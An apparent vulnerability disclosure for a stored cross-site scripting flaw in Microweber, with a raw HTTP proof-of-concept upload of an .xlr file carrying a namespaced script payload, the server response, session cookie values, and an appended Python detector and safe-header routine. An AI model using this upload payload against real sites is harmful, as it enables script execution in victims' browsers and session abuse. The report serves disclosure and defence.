Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber
Reported on
Jul 2nd 2022
Description
The file upload function accepts .xlr files. An uploaded .xlr file containing JavaScript (XHTML-namespaced script inside an XML document) is stored and served from the site's origin, resulting in stored XSS.
Proof of Concept
REQUEST
POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"
xss_poc.xlr
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"
0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"
1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
<?xml version="1.0" encoding="UTF-8"?>
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
<info>
<name>
<value>123</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
-----------------------------80883503232369887683205133266--
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129
{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.xlr","name":"xss-poc.xlr","bytes_uploaded":"959"}
PoC Image
Impact
This vulnerability allows arbitrary JavaScript execution in the browser of anyone who opens the stored file, which can be used to send HTTP requests, perform CSRF, read the content of same-origin pages, etc.
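As an added defensive example (not part of the original report or of the Microweber code base): a content check that flags uploaded XML-like files carrying script elements or event-handler attributes in the XHTML or SVG namespace, as in the PoC body above, plus the response headers that keep a stored upload from rendering in the site's origin. Function names and the sample inputs are constructed for this example.

```python
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"
SVG_NS = "http://www.w3.org/2000/svg"

# Constructed sample mirroring the PoC body: the <a:script> element is bound
# to the XHTML namespace, so a browser rendering the XML will execute it.
POC_XLR = b"""<?xml version="1.0" encoding="UTF-8"?>
<html><head></head><body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
<info><name><value>123</value></name></info>
</body></html>"""

# Constructed benign sample with no active content.
BENIGN_XML = b"""<?xml version="1.0"?><info><name><value>123</value></name></info>"""


def active_content_findings(data: bytes) -> list:
    """Return reasons an uploaded XML-like file could run script in a browser.

    Checks element and attribute names after namespace resolution, so a
    prefixed element such as <a:script xmlns:a="...xhtml"> is caught even
    though the literal tag name is not "script". Empty list = nothing found.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return findings  # not well-formed XML; decide separately how to handle
    for el in root.iter():
        ns, _, local = el.tag.rpartition("}")  # Clark notation: {ns}local
        ns = ns.lstrip("{")
        if ns in (XHTML_NS, SVG_NS):
            if local.lower() == "script":
                findings.append(f"script element in namespace {ns!r}")
            for attr in el.attrib:
                aname = attr.rpartition("}")[2].lower()
                if aname.startswith("on"):  # onload, onerror, ...
                    findings.append(f"event handler {aname} on <{local}>")
    return findings


def safe_download_headers(filename: str) -> dict:
    """Headers that make a stored upload inert when fetched by a browser.

    Serving it as an opaque attachment with sniffing disabled means markup in
    the file is never rendered in the site's origin, even if the content
    check above is bypassed by a format it does not understand.
    """
    safe_name = "".join(c for c in filename if c.isalnum() or c in "._-") or "download"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }
```

Both checks belong together: the content scan catches this PoC at upload time, while the download headers cover any stored file regardless of what the scan recognises.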
Occurrences
Thanks for the report. In order to upload the .xlr file you need to be logged in as admin.